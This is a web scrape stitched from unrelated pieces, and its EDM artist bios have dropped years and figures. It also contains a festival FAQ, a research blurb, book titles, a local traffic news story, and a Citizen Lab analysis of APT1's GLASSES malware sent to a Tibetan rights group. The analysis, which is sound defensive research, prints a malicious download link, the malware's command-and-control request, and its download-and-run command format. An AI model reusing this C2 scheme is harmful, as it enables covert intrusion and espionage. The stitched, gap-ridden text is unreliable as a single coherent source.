Phantoms, comprised of Los Angeles-based natives Kyle Kaplan and Vinnie Pergola, are a dance act that does exactly that. They keep everyone continually dancing with an impressive live set of drum pads, synthesizers and midi controllers, while also keeping audiences engaged through their own style of humor on social media platforms. A full-time job for the band. Their fun and downright captivating personalities shine through all aspects of Phantoms. After releasing their first EP in to massive press like Billboard and Entertainment Weekly, the duo has been remixing some of their favorite songs of the year and playing shows and touring with the likes of Big Wild, Com Truise, Kiesza and more.
Ask the three men at the heart of it, you get three different answers. That was the essence of the weekend for me. Everyone was screaming like crazy and it was a really fun moment. It never ceases to amaze me both how much love and dedication the fans have towards it all. They were coming together in the spirit of openness and warmth and music. In so doing, Jono, Paavo and Tony have created something special: a common ground where all sorts of people and ideas can come together. Presenting, then, Common Ground. It features a quartet of guest vocalists, a couple of them longstanding members of the family, a couple of them valued newcomers.
But I never thought we could do a show at a Broadway theatre, or the Hollywood Bowl or the Royal Albert Hall — the ultimate homecoming gig for any band based in London. It was really the stuff of dreams. We were swimming in a frozen lake, then popping indoors to write a song with a piano and a mic in this totally isolated place.
It was a fantastic place to be creative together. I was just blown away by him. And that song is really a result of one of these days where we just sit down with some ideas and at the end of the day we have a song. And this song puts into words that feeling that everyone can write their own script if they want to. It has depth and a fantastic inspirational side. He wanted to hymn the qualities of a once great, then neglected and now resurgent heartland American city. All were great in their own ways, but none fitted the bill exactly. It sounds like something really old and something really new mixed together.
But as for the rest of Common Ground? The backstory, he continues, is that the song was always meant to be a vocal track. In doing so, he has helped to lay the groundwork for a titanic musical and cultural shift: a post-rock EDM revolution that has captured the imagination of a new generation of music lovers across North America.
His own live show is a jaw-dropping spectacle that finds him performing in front of an foot wide, three-stories tall LED screen that blares images synched with the music while strobe lights scan the crowd. Growing up in the Chicago suburbs, Raddon was heavily influenced by New Wave bands like The Cure, Echo and The Bunnymen, and The Smiths that ignited his love for melody and lyrics and was strongly impacted by the house music scene that developed in Chicago.
The Fire disc contains ten original songs geared firmly toward the dancefloor, while on the Ice disc, Kaskade delivers the perfect down-tempo post-club experience by remixing all ten songs. Both discs showcase the musical versatility tat has characterized his work ever since he began writing his own songs. Love Available in twenty one different flavors and available in over thirty countries. He started making dubstep in and from there evolved into a whole sound and genre of his own.
With swampy bass lines and ambient mystical soundscapes, a Toadface set is a journey that all bass music fans can enjoy. The origins of Montreal born DJ-producer-incipient Teutonic legend Tiga lie to the vague and troubling East, where he was weaned on the nefarious milk of the notorious s Indian club scene.
I was at once appalled and enraptured. After that, I had no choice in the matter. I am, I feel, a very interactive person. That same year, the Montreal dance community found a haven for the boldest feats of dance, where fools are in love with mystery and sex-valor is prized above all else. In , Tiga started Turbo Recordings as an outlet for his wildman organ escapades but he soon found a host of other artists who were willing to be paid to record for him. Turbo has released over 20 albums, 2 samplers, and 12 vinyl twelve inches as well as secured global distribution with Prime, Intergroove and Caroline.
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You must understand— on a whim, we revealed the hidden fire of Europe. But fires need tending and lumber. And so be advised of the onslaught of Tiga-powered releases, both recent and forthcoming. They are his craft, his life, his fire:. Tiga has remixed for the likes of Martini Bros. K7 for their DJ Kicks series. His first full-length original artist album is due within the year. Boreta, edIT, and O oah came together around , passing through various members until settling on this core trio of musicians.
Together, they combined their different skills and aesthetics into the compellingly collaged whole that has become one of the most beloved live electronic acts, and distinctive recording artists, working today. By combining sound and force with weight, the Bassnectar experience engulfs the senses.
The experience of Bassnectar is more visceral than auditory, as the musi c sets any stage for an adventure without rules or limitations. Bassnectar is the brainchild of Lorin Ashton, and his open-sourced musical project is as diverse as it is imaginary, as raw as it is meticulous, and as fierce as it is stunning. Spanning the spectrum of sonic style, the music draws inspiration from every genre imaginable and supplies a synthesis of intense, wobbling basslines and hypnotic soundscapes for a devout international audience that desires the beautiful and the bestial in the same breath.
In whatever medium Bassnectar works, music is the lure and social impact is the sincere intention. I think privilege confers responsibility, and Bassnectar is a reflection of that opportunity to give back; the motion of my cells bouncing back at the world. Hailing from the South, Midnite Panda has been bring ing the heat to the Atlanta music scene since The duo are no strangers to the circut, having played major festivals such as Tomorrowworld, Counterpoint, Imagine, Moonshine, Big Beat, and Kingdom Rave, amongst others.
In Midnite Panda embarked on two Canada tours, playing shows and collaborating with Atlanta clothing sponsors Six Feathers. Midnite Panda has released five mix tapes in their Strictly Bangers Series, gaining more than , plays. This year Midnite Panda is set to release original work, bringing their unique brand of Atlanta trap, bass, and hip-hop to the world, making them the ones to watch for in Originally starting life as a trio, North London outfit Ivy Lab were brought together out of a shared enthusiasm for experimentations on the fringes of the UK b ass music scene.
Those looking for a top 40 DJ to keep toes tapping have come to the wrong place. For Levitation Jones, peculiarity has always been nothing more than the norm, a nd compromise has never been a part of the equation. After all, we all have our own style of art to express. That approach has been enigmatic to his rise as one of the most celebrated and renowned names in independent bass music, bustling from coast to coast, all whilst spreading a dark cadence of sub-bass. This quickly rising producer blends his original productions with heavy influences of underground dubstep and future bass paired with a seemingly effortless style of live mixing, pulling his audience in for a trip to the depths of the strange and the weird.
Along with him, Jones will cart an additional 75k watts of lethal Danley Soundlabs state of the art low-end technology. His discography includes 2 critically acclaimed full length artist albums, 8 DJ mix CDs, as well as numerous singles and remixes for artists such as Freq Nasty, Afrika Bambaata and Keoki. He has been featured in countless magazine articles and interviews both in the US and worldwide. His brilliant recording endeavors along with his incessant touring marked by consistently awe-inspiring DJ sets have made him one of the most recognized and well respected DJs in the country.
After a lengthy hiatus, sees DJ Dara return to the studio to produce the kind of beats he wants to hear. Watch this space…….
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After a three year hiatus that officially ended in , the two embarked on an exhaustive reunion tour; playing high-profile global festivals like EDC, Creamfields, Tomorrowland, Electric Zoo, Spring Awakening, Sunburn Festival as well as club dates in over 20 countries around the world. Despite the envelopment of EDM in popular culture, the two are sticking to their guns and following their most innate impulses. We choose sounds and words that we feel will mean something to a lot of people and at the same time, make them put their hands in the air.
His most recent works have taken him from the DJ booth of the worlds hottest nightspots and festivals to the studio producing soundtracks for Hollywood blockbuster movies. His diversity in artistry and ability has earned him accolades from critics and fans alike. Garnering him not 1 but 2 Grammy Nominations for his works. But lets take a step back. Not what some might have expected from one of Trances preeminent masters. But he knew then music would be his life.
The second trip and more contemporary influence was in which brought Paul to the White Isle of Ibiza. Here he discovered the Balearic sound that flowed through the Ibiza air at clubs such as Amnesia. Inspired, he took the music and experiences back to the UK and became its ambassador. Paul returned often holding residencies at Amnesia and Pacha in Ibiza. Around the same time Ministry Of Sound in London was opening and tauted Paul as their first resident. However it was his famed residency at UK super-club Cream in Liverpool that brought Paul global respect as a master of his art.
It was some say the catalyst to what has made him a touring legend. Highlights include three worldwide tours warming up for Madonna and U2 with both artists insisting on a DJ set from Paul instead of a support band ; performing physically on the Great Wall of China and two sold out dates playing to 30, people at the Hollywood Bowl in California. A year after that first visit to Ibiza, Perfecto was born. With countless high profile releases and remixes in its path, Perfecto Records is still the benchmark to which so many labels measure themselves.
As well as three acclaimed artist albums under his own name. In recent years Paul has also been responsible for creating some of the most breathtaking film scores and cues for a long list of Hollywood blockbusters — including The Bourne Identity, Matrix Reloaded, Shrek 2, Swordfish and Collateral. But his most anticipated release is yet to come. Astonishingly, despite all his success in the worlds of chart music and film, Oakenfold has found time to keep in touch with his roots as a club DJ.
Over the past 3 years he has held a weekly residency at the legendary Rain nightclub in The Palms, Las Vegas. Planet Perfecto is a fully produced show with 75 circus performers, cutting edge visuals and special effects — giving the 3,strong crowd a truly unique experience. Paul Oakenfold is the sovereign of DJ culture and is its most recognizable icon.
Original, emotional, visceral. Taking the next logical step, the group decided to set up their own label. This was a culmination of seven years of studio knowledge and musical experimentation and it was received with such resounding success that deadmau5 picked it up for a Special Edition re-release on his own mau5trap label. Enlisted by the likes of Skrillex, Labrinth, deadmau5, Mark Knight ft. His DJ sets already incorporate this style heavily into his mixing, and will see a lot of original productions in this vibe. His recent collaboration is currently in rotation on Sirius XM and hit the top 10 of Beatport overall.
Six years later, having logged countless hours refining their now-signature sound and growing their impressive catalog, the duo is set to release their debut album Self Help on October Their album tour spans four months this fall, beginning in Europe and then kicking off the U. Armed with their fresh productions, Sam and Gavin have something irresistible to offer fans at every stop.. KOAN: A puzzling, often paradoxical statement or story, used in Zen Buddhism as an aid to meditation and a means of gaining spiritual awakening.
With his new found fame EDX quickly climbed up the ladder of recognition with labels and producers asking him to sprinkle his remix magic touch onto their releases. The guys started out producing music in the early 90s, delivering club hits under several artist names. Just check these names on Spotify or iTunes and discover a collection of awesome oldskool house music! Drawn together by a common appreciation of the house music movement of the early 90s, their career got off to a turbo-charged start with the release of what would become one of the defining records of their career. In the duo came up with what would be their last alias Chocolate Puma.
Head to see a Chocolate Puma live DJ set and three quarters of the tracks you hear will be produced or remixed by them, while the rest contains personal edits of some of their favourite brand new or classic tracks, all mixed and improvised on the fly into one massively energetic set. In Green Velvet launched Relief Records and since that time has been a constant presence in the industry. When this very eccentric, green Mohawk wearing Green Velvet emerged, he sent shock waves throughout the House and Techno music scenes. What was even more intriguing was his background.
Born in the southern suburbs of Chicago, IL he has always been an active athlete and focused student determined to follow his dream of becoming a chemical engineer. While he excelled scholastically he was socially introverted, but always committed to finding ways to share his enthusiasm for living. Until one day, he realized that while his dream was to become a chemical engineer…his passion…his God given talent was to pursue life in the music industry.
That passion and commitment led him back to his hometown, and clearly kept Chicago on the House Music map. Love of the music…Love of the fans…Love of other artists.
The history of great releases on the label and artists speak to this. There are too many artist collaborations to mention…. One thing is very clear, in this industry success and change go hand in hand. Staying current with the scene and his fans is paramount. Lotus has crafted a unique musical style outside of simple genre limitations. On a given weekend the band could be the only group with guitars at an all electro nic music festival and then the next night crash a traditional rock festival with their dance heavy beats, synths and samples.
No matter what the venue, the energetic joy and catharsis of a Lotus show is infectious. The band slowly built a devoted fan base through steady touring and the crowds have grown at an increasing pace. The way music is produced and performed is growing at an astounding rate. From the controls of a tiny laptop, a performer now has the power to mix, change and loop sounds in a concert setting with great ease.
This modern twist of technology is bringing a new level of music to the electronic dance party. While the genre of live electronica is relatively new on the music circuit, nobody is breaking the boundaries of live producing and improvisation like EOTO. Fusing elements of live instrumentation, house music, dubstep and electro into their dance ready sound, the band will be taking the country by storm beginning in late September for their perennial fall tour, performing 33 consecutive nights in a row.
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Consisting of Michael Travis and Jason Hann the duo mixes the organic sounds of live drums, bass and guitar through a variety of programs and gadgets to create a style of music that is more likely found in a dance club, then a live music theater. What sets EOTO apart from other artists in this emerging genre is how the music is created. A trait that has fans old and new catching multiple shows on a tour and packing venues wherever they play. Or maybe EOTO is selling out venues around the coast for the spirit of dance music they bring in general. It should come as no surprise that the members of EOTO have performed with a range of musicians second to none.
Born in Bangladesh, raised in New York City, inspired by everything from hip-hop to classical music to punk rock, both his life and music have been defined by an amorphous quality that only a third culture kid could understand. The OWSLA boss was so impressed that he signed the track for release and dropped it into heavy rotation in headline sets around the world, beginning with Glastonbury in the UK. From that point, Jai Wolf was a fixture at major stateside festivals, developing a reputation as a master remixer, often mentioned in the same breath as Flume and ODESZA in that wave of future bass.
I had no expectations. The song made Jai Wolf a star, but creatively, he was already looking towards bigger and better things. He decided to ditch the drops and focus on crafting songs with depth, with meaning and melody. The result was the debut Kindred Spirits EP in , a record that stunned critics and signaled the birth of Jai Wolf the songwriter, the live performer, the indie-tronic artist. The EP somehow merged the sweet melodies of 80s synth-pop with the atmosphere and grandiosity of EDM, the intimacy and closeness of chillwave, and the thoughtful introspection of indie-rock.
The creative release of Kindred Spirits and the deep connection Jai Wolf has forged with his worldwide fanbase has strengthened his sense of mission. I want you to feel nostalgic. I want you to reflect on your life. I also want you to be inspired about where your life could go. The story of Jai Wolf so far is more than the hits, the packed dancefloors, or co-signs by mega-stars.
You can take the elements you like and find a way to speak them through your own voice. With his first ever LP impending in , it seems that this story — one that spans the globe and genres alike — is just beginning…. In an ever-shifting social landscape of self-promotion and curated digital identities, ZHU is a unique voice making a name for himself, without ever having mentioned it. With a Grammy nomination and underground hits accumulating almost half a billion online plays, ZHU is an inspiration for the entrepreneurial millennials who shun the status quo in favor of cultural exploration and game-changing creationism.
With coverage from Pitchfork to The New York Times, the EP was critically acclaimed as a worldly collection of music appreciated for its immaculate attention to detail and groundbreaking sonic concepts. With projects like animated shorts scored to music, a fashion line, and digital art activations, his shows incorporate all of his work.
Combining cinematic beauty, with avant-garde fashion, live music performances, and art installations, ZHU fans never know what to expect next. The unforgettable Red Rocks weekend saw the return of his powerhouse piece live funk band and the second annual limited edition run of his Chasing The Golden Hour Ale. Touring aside, has been a year of self-reflection and creative development for Kwiecinski, who has signed off of social media and turned his focus on his new music.
Since his start, GRiZ has become a champion of the live electronic landscape; effortlessly blending improvised saxophone, guitar, vocals and more over booming bass lines, hard drops, and some of the most creative transitions in the game. Spread Love. Join the movement as Riot Ten takes over the scene.
Bear Grillz. At the start of the year, the as-yet-unidentified Bear Grillz revealed his true identity on the Jerry Springer show. Two million viewers and fans watched with amazement as he removed his iconic Bear Grillz helmet on camera. His notoriety only increased, and saw him booked for 12 international festivals while touring as support for Excision on his Paradox Tour.
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An 8 track EP, with talent straight from the rosters of Bass Music royalty, is set to drop later this year, and a full North American tour is slated for the spring. The name Bear Grillz has always been synonymous with face-melting, neck-breaking bass music, and his shows are always one mosh pit away from a prison riot. They toured across North America in with no official product yet available, while saw them land gigs at the Ultra festivals in both Miami and Seoul, South Korea.
The ASOT brand has grown into a complete live show experience and touring concept, with stages and events all over the world. In addition, Armin is the co-founder of the Armada Music record label together with Maykel Piron and David Lewis , which has been acclaimed internationally for releasing top-notch Electronic Music in a variety of genres. Life is full of decisions that either make or break us. In the grand scheme of things, selling his motorized scooter for his first studio set up may well have been the best move Alessandro Lindblad — a Stockholm born youngster of Italian ancestry — ever made.
The summer of was a busy one for Alesso. Playing the main stage of Summerburst at the beginning of the season, interspersed with headline shows at Amnesia and Radio One Weekend, Ibiza; Tomorrowland, The Light, Electric Zoo, and everywhere in between. As a strong producer as well as a DJ the future looks bright. Having already spun sets to a variety of crowds, on a backdrop of different skylines on various stages across the world, this is a man who is destined for greatness.
Pursuing his passion for music is inbuilt, a way of life, which means that exciting times are ahead. But the duo show no signs of slowing down in Since then, the album reached No. The story of Galantis started back in Shortly after, the two started hanging out, playing each other songs and sharing bits of ideas in the recording studio. That like-minded thinking helped create Pharmacy. Galantis has truly been a phenomenon in dance music.
Buy Tickets Hippie Sabotage hippiesabotage. Buy Tickets The Funk Hunters thefunkhunters. Buy Tickets Big Gigantic biggigantic. Buy Tickets Black Sun Empire blacksunempire. Buy Tickets Andy Bruh andybruh. Buy Tickets Will Clarke djwillclarke. Buy Tickets Noisia noisia. Buy Tickets Netsky netskymusic. Buy Tickets Shiba San shibasan. Buy Tickets Claptone claptone. Buy Tickets Chris Lake chris-lake. Buy Tickets Gorgon City gorgoncity.
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Every butt you throw on the ground someone has to pick up! No outside alcohol is allowed into Imagine Festival. You know the difference. No totems over 10 feet in height, constructed of metal or wooden pieces, sharpened elements, or are capable of being pounded into the ground or causing harm to others.
Q: If I am staying off-site can I leave the festival grounds and come back? Q: If I am camping, can I leave and come back? Q: When will I receive my wristband? All sales final. No refunds or exchanges. Q: Can I upgrade my ticket? Q: How long can my car be parked in day parking? Q: When can I begin to set up my campsite? Q: What should I expect the weather to be like during the festival?
Q: Will there be a lost and found? Can I attend with a legal guardian? Q: What are acceptable forms of Identification? Q: Can I pass out flyers at Imagine? A: Yes, medications are allowed into the festival and campgrounds as long as they comply with the following: No over-the-counter medication is permitted unless in unopened, factory-sealed packaging. No vitamins or supplements of any kind are permitted. Prescription Medication can only be brought into the festival ground with the following: A valid photo ID See list of acceptable forms of identification ; Medication must be in original prescription bottle, in-date, legible, with name corresponding to photo ID; Only one type of medication per bottle matching the description printed on bottle ; Any prescription controlled substances may only be brought in quantities reasonable for your time at the festival.
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Take advantage of these vendors, making sure you are eating at least 3 meals a day to give your body enough energy to get through the day and party through the night. Safe Decisions Your body is a wonderland. Without a prescription, there is no way to know what drug or dose could be safe for you.
In addition to addressing specific needs of digital artists, this research should in the long term, enable professionals and scientists to represent and interact with models of their objects of study, and educators to quickly express and convey their ideas. We would also like to advance towards the development of a new expressive media, enabling the general public to directly create animated 3D content. Made with by Graphene Themes.
More precisely, three main research topics are addressed: Shape design : We aim to develop intuitive tools for designing and editing 3D shapes, from arbitrary ones to shapes that obey application-dependent constraints — such as, for instance, being developable for surfaces aimed at representing objects made of cloth or of paper. Motion synthesis : Our goal is to ease the interactive generation and control of 3D motion and deformations, in particular by enabling intuitive, coarse to fine design of animations.
The applications range from the simulation of passive objects to the control of virtual creatures. Narrative design : The aim is to help users to express, refine and convey temporal narrations, from stories to educational or industrial scenarios.
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Guns dont kill people, Chuck Norris does. (Radici)
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THE WOMAN WHO FELL TO EARTH (Slovak History, Folklore and Culture Series Book 1)
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Matthew Pooles Commentary on the Holy Bible - Book of Daniel (Annotated)
Collected Poems 1947-1997 (Penguin Modern Classics)
Imagine Schools is built upon expectations high enough to live up to a child's potential. In our schools, success means developing character and enriching.
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APT1’s GLASSES – Watching a Human Rights Organization
By Seth Hardy
Malware (“GLASSES”) sent in 2010 is a simple downloader that is closely related to the GOGGLES malware described by Mandiant in their APT1 report.
GLASSES was sent in a highly targeted email to a Tibetan human rights organization, demonstrating that APT1 is involved in more than just industrial and corporate espionage, with attacks against civil society actors documented as early as almost three years ago.
The methods and infrastructure of this attack are consistent with those described in Mandiant’s APT1 report, e.g., spear phishing against an English-speaking target, having an infrastructure of compromised machines for malware distribution and C2 operation.
The GLASSES sample analyzed shares a large percentage of code and an operational C2 server with a GOGGLES sample, indicating that they are from the same source.
The GOGGLES sample we discovered that communicates to the shared C2 server is not exactly the same as described in the Mandiant report, indicating that GLASSES may be a variant of GOGGLES, and that the software has been used while under active development.
On February 19, 2013, Mandiant released a report titled “APT1: Exposing One of China’s Cyber Espionage Units.” [Offsite-PDF] The report describes the activities of one cyber espionage group, APT1 (referred to as “Comment Crew” or “Byzantine Candor” in other reports), that has targeted a large number of organizations in a wide range of industries, stealing terabytes of data. Mandiant traced APT1 operations to China and makes the case that the group may in fact be the 2nd Bureau of the People’s Liberation Army (PLA) General Staff Department’s 3rd Department, also known as Unit 61398.
In early 2011, Citizen Lab was forwarded a malicious email containing a link to a malware sample for analysis, as part of our ongoing study of targeted cyber threats against human rights organizations. This email, sent almost a year earlier to the head of an organization focused on Tibetan rights and issues, contains malware that is very similar to one program described in Appendix C (“The Malware Arsenal”) of Mandiant’s report, which they named “GOGGLES.” (We have previously reported on other targeted attacks against Tibetan organizations, such as the recent PlugX RAT and the LURK variant of Gh0st RAT.)
The malicious program analyzed at Citizen Lab shares both a large percentage of code and the same command and control (C2) infrastructure as the program described in the APT1 report. We are calling this program GLASSES because it is related to GOGGLES and uses a compromised eyeglasses storefront website as its C2 server.
GLASSES is particularly interesting because it demonstrates that APT1 is not limited to attacks against industrial and commercial organizations, but also targets civil society organizations. It is unlikely that our study’s participant is the only civil society target of APT1 malware, although no attacks against civil society organizations have been documented in the Mandiant report. Both Mandiant and Shadowserver have included a Tibetan-themed domain in domain lists, supporting the idea that other organizations are targeted, but have not included any information on the details of Tibetan-related APT1 operations. A Bloomberg article mentions that the nonprofit organization International Republican Institute was compromised by the same group in June 2011, but no technical details of the attack were released.
Civil society organizations such as the study participant that received this email are frequently and persistently attacked just the same as corporate and government targets. However, reporting on such attacks by security vendors is less common: these vendors generally lack visibility into civil society, as civil society organizations often do not have the resources to buy their security products or services. This may be the reason for the lack of reference to civil society targets in Mandiant’s APT1 report, as it is likely that Mandiant has better visibility into corporate and government targets through their client base.
Targeted Email and Infection
On March 17, 2011, we were forwarded an email sent on April 28, 2010 from a Yahoo! webmail address to someone at one of our participating organizations. The email is written in English, and references the recipient’s organization by name.
Fig 1: Email forwarded from study participant
Some details of the email immediately flag it as suspicious: the name in the email address is “Nate Herman” (see Figure 2 below for full header details and other information) although the email is signed “Martin Lee.” The forwarded email included full headers, so we were able to obtain more information about its origin (Yahoo! includes the sender’s source IP in the headers when an email is sent over the webmail interface). In this case, the originating IP is 69.95.255.26, which is registered to One Communications, Inc. / EarthLink Business, and is very similar to IPs used in a similar attack — demonstrating that this attack is not isolated, and the IPs are likely being reused for other malware campaigns.
Fig 2: Email imported into our analysis system, showing the sender name, original date, sending IP, and other details
This email contains a link to a ZIP file located at hxxp://tcw.homier.com/attchments/details.zip (MD5: 6fb3ecc3db624a4912ddbd2d565c4995). The homier.com domain belongs to Homier Distributing Company, Inc. and appears to have been compromised. A search for this subdomain can find other instances of malware hosted there, such as that detailed in ThreatExpert’s report on 87e840054d37f83c5077e685d45c0abb indicating a file in /images/update.bin, and another malicious program getting the file /attachments/SalaryAdjustment.zip.
The details.zip file contains a single executable file, Save my Tibetan wife – for [targeted organization’s name].exe (MD5: 356fc183b7e73a74383fdb1e74f84709) which pretends to be a folder by using the same icon as a folder:
Fig 3: The executable (“Application”) file pretending to be a folder
When the executable is run, it deletes itself, then creates and opens a folder of the same name with a PDF document (filename: details.pdf, MD5: a3cd8f45eef80eacb6bf3d2415139efa) in it. From the user’s perspective, this is almost indistinguishable from opening an actual folder:
Fig 4: Actual folder with PDF
The PDF is not malicious, but it is damaged: the header and EOF markers have been deleted, and there is no xref table. As a result, Adobe Reader and other PDF viewing programs are unable to open it.
Fig 5: Broken xref table at end of embedded PDF
The content of the PDF implies that it was repurposed from a job posting regarding a position relating to public health in association with USAID in Nepal. Objects that are not displayed have information about what appears to be a real job posting, and the author metadata seems to be from a real person at the organization. Because the content is not directly related to the subject matter of the email, it suggests that it is not meant to be opened and may have been reused from a previous attack against a different organization.
Fig 6: Text relating to USAID/Nepal-related job posting
Meanwhile, the original program drops an executable named spkptdhv.exe (MD5: 80a45ce5d3cc416fffdafa101bdf002c) in %temp%, and adds itself to the registry in order to restart on reboot.
Malware – “GLASSES”
The dropped executable connects to a website and downloads a single HTML page. The site appears to be part of a legitimate website for an eyeglasses company, suggesting that it has been compromised. We contacted the hosting provider of the compromised site in March 2011, but never received any response.
The HTTP request includes a marker in the User-Agent string, indicating that it is was sent by this malware:
GET /ewpindex.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; Clj26Dbj.XYZ)
Host: ewplus.com
The marker string has two parts, separated by a period. The first part (“Clj26Dbj”) is an encoded version of the computer’s name, presumably for tracking which machines at an organization are infected. The second part (changed to “XYZ” here) appears to be a campaign code, as the original is the standard abbreviation for the organization to which it was sent.
The marker may be in the User-Agent string so that it shows up in the access log on the web server, indicating that the attacker has access to these logs and may monitor them for signs of infection. As the User-Agent string shows up in web access logs, it would be simple for an attacker to monitor for compromised computers connecting to the C2 server this way.
The command from the compromised web page (ewpindex.htm) looks like this:
Fig 7: How the C2 server (a compromised web page) issues commands
The accessed page contains an anchor with an encoded command in it. The malware looks for the string in the anchor tag with the target NewRef, and then decodes it to a command. The link itself is empty, so that there is nothing to click on and it is invisible on the page. Another page on the same site, aboutus.htm, contains a different command although the URL is not apparently used by this binary.
The commands found on the website are:
ewpindex.htm KVHc6Gcj s:120
aboutus.htm KVHe6ibj s:30
Looking through the malware code, it is evident that this is a simple downloader with only two commands. The commands are:
Command Character
s Sleep Sleep for specified number of minutes s:120
r Download and Run Download and run executable binary at specified location on the web r:http://www.foo.com/bar.exe
The C2 server is still live, but it has the same sleep command as it did when we reported the compromise to the hosting provider approximately two years ago. It is unknown whether this means the attackers have lost control over the compromised server, or whether it is still live — for example, it may require manual intervention to change the page to a download command, and this may only happen when logs of an infected computer appear again. The attackers may choose only to provide a malicious second stage program for GLASSES to download and execute when they have verified the target, or may only keep the download link live for a very short amount of time to discourage its discovery and analysis. At no point in our investigation of this malware did the command string change from this sleep command.
Comparison to GOGGLES, an APT1 Attack
In “Appendix C: The Malware Arsenal” of the Mandiant APT1 report, the authors describe and give names to 49 different malicious programs. One of these is called “GOGGLES” — a simple downloader that is controlled via encoded markers in files accessed over HTTP.
The C2 communication method, commands, and particularly the data encoding method in GOGGLES are very similar to the sample we analyzed. The connection was initially noticed due to a shared string used in decoding methods, and the presence of the same two commands for each program. Follow-up code analysis confirmed that these programs share much of the same code, and use the same C2 server. It is very likely that GOGGLES is a later version of GLASSES.
Decoding Algorithm
In GLASSES, the URL for the webpage and the campaign code are not found in plain text inside of the binary. The program keeps the information stored in an encoded format that is not immediately recognizable. However, the decoding function uses a very recognizable string, “thequickbrownfxjmpsvalzydg,” which is how we were able to quickly identify this malware as being possibly related to APT1:
Fig 8: Decoding function with “the quick brown fox” string
This decoding method is mentioned in the Mandiant report multiple times, used by the GOGGLES malware as well as three other malicious programs (SWORD, NEWSREELS, and LONGRUN).
Sharing C2 Domain with GOGGLES
When we first analyzed the sample in March 2011, we searched a private malware database for related network traffic and found the following results:
At the time, the significance of the file 4poval.jpg was not immediately clear. Upon casual inspection, it seems to be an image that is related to the website content:
The Mandiant report describes GOGGLES sending an initial HTTP GET request for a JPEG image file with an embedded control command. The command offset is stored six bytes before the end of the file, and the command has a magic value (an arbitrary string of bytes) to indicate that it is actually a GOGGLES command file, and not just image data:
Fig 9: GOGGLES download file format, from Appendix C of the Mandiant APT1 report
Checking the 4poval.jpg file (still available on the website as of February 2013) shows that the GOGGLES command data is present.
Fig 10: GOGGLES C2 data in image file
Six bytes from the end of the file is the four byte offset 00 00 09 68. The bytes ff 02 b7 bc at offset 0x968 are the magic value described in the Mandiant report (in reverse order due to byte ordering), confirming that this is a GOGGLES control file.
Since the two malware programs use the same domain for command and control and share much of the same code, it is very likely that these programs are used by the same group. The GOGGLES code is more sophisticated than the GLASSES code: in addition to a more effective method of hiding the command data, it also has more countermeasures to protect against reverse engineering and hide itself on the infected system. For this reason, it is very likely that GOGGLES is a later version of GLASSES.
Analysis of GOGGLES Sample
A search using the VirusTotal Malware Intelligence service for the MD5 of the sample found in our network traffic database found a copy of the GOGGLES program that downloads the command image from this C2 server. Comparing this GOGGLES binary 64c47ead2e95e4033f0f1f1fedaf15cf (which uses the above image file to receive commands) to the behavior described in the Mandiant report does not result in a 100% behavior match. The User-Agent string does not exactly match the one described in the report, but uses one similar to the GLASSES sample. After the normal user-agent information, there are two strings, which likely correspond to the encoded computer name (“Alj26Bbj”) and campaign code (“RUCK”).
Fig 11: Found GOGGLES sample C2 communication
The User-Agent string that is different than that described in the Mandiant report shows that the behavior of GOGGLES was changing while in use, strengthening the idea that GLASSES may be an earlier development of the same malware family.
Fig. 12: Commonalities between GLASSES and GOGGLES samples
The description of GOGGLES in the Mandiant report and its attribution to APT1 has given us enough information to attribute a similar attack to them as well. This attack, which we are calling GLASSES, took place in April 2010 and was targeted against a Tibetan human rights organization. This demonstrates that APT1 is interested not only in industrial and commercial targets, but civil society organizations as well.
The sample of GLASSES we were sent has many technical similarities to Mandiant’s description of GOGGLES, including specific strings used for encoding and decoding. While this suggests that the two programs are related, there are other possible explanations for this connection, such as an attack found in the wild and repurposed by a new group. By searching for related network traffic, however, we were able to discover a file on the GLASSES server which contains GOGGLES control information — a clear indication that the malware is being operated by the same group.
Using VirusTotal’s Malware Intelligence service, we were able to find a copy of the specific GOGGLES binary using the same C2 server. Analysis of this GOGGLES sample revealed behavior that was similar but not exactly the same as the behavior described in the Mandiant report. The difference in behavior between the GOGGLES versions suggests that the malware was under active development during the time period of the attacks. Because GLASSES is a simpler version of GOGGLES with the same commands but fewer countermeasures against reverse engineering and analysis, it is likely that GLASSES is an earlier version of GOGGLES.
The vector for the GLASSES attack we observed was consistent with the modus operandi for APT1 described by the Mandiant report: a targeted email sent to an English-speaking target, using a set of compromised computers as jumping points. This type of threat is very dangerous to civil society organizations as well as industrial and commercial targets.
As with other targeted email attacks, organizations can protect themselves against this kind of attack by treating email with caution, especially email with attachments or links. A more detailed set of recommendations for defending against email and other threats can be found at Citizen Lab’s page on Recommendations for Defending Against Targeted Cyber Threats.
Malware, Targeted Threats, Tibet
མི་མང་གི་ཚོགས་སྡེ་ཁག་ལ་རྒྱུན་མཐུད་པའི་གློག་ཀླད་ཀྱི་དྲ་འབུའི་རྒོལ་རྡུང་འཕྲད་བཞིན་པ།
Behind the Syrian Conflict’s Digital Frontlines
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Piedmont: Council OKs changes to fix traffic ‘nightmare’
jdehart
Originally posted on Contra Costa Times
PIEDMONT — The Piedmont City Council voted unanimously Monday to make changes for cars traveling up Magnolia Avenue to Highland Avenue after listening to the area being described as a “Bermuda Triangle” and a traffic “nightmare.”
Several options were presented to the council from traffic engineer Michelle DeRobertis to alleviate the weekday congestion from cars lining up along Magnolia to drop off or pick up students from Piedmont High School, Millennium High School or Piedmont Middle School. A long queue develops, which backs up on both directions of Highland in front of Veterans Hall.
Motorists are making illegal left turns off Magnolia at the Highland Avenue triangle and blocking the area where police cars are parked, police Chief Rikki Goede said.
“We’ve had several near misses at the pedestrian crosswalk. Officers turn on their lights to leave the station and the cars do not move. This impedes officers leaving to respond to calls,” Goede said, adding, “It’s a Bermuda Triangle.”
Using signage and striping, the area between the police department and landscaped triangle will be closed so that public use of the area for turnaround will not be allowed. This will create a police parking only zone of six spots. There also will be two public spots for those having business in the police department.
The city obtained a grant sponsored by the Institute of Transportation Studies at UC Berkeley to pay for DeRobertis’ services to perform a safety study of the affected area.
This will be a one-year pilot project.
“The chief made a compelling point about public safety. This entire area is a nightmare. This is making a start,” Vice Mayor Jeff Wieler said.
While change is always difficult, Mayor Margaret Fujioka said, “Safety trumps aesthetics.”
In other business, the council voted to waive permit fees as an incentive for small jobs to promote public safety and preparedness. Fees would be waived for installation of automatic gas shut-off valves, seismic strapping for chimneys, installation of gas log fireplaces and a back flow prevention device for drip irrigation to water street trees.
Public Works Director Chester Nakahara said the loss of income to the city for this pilot program would be negligible.
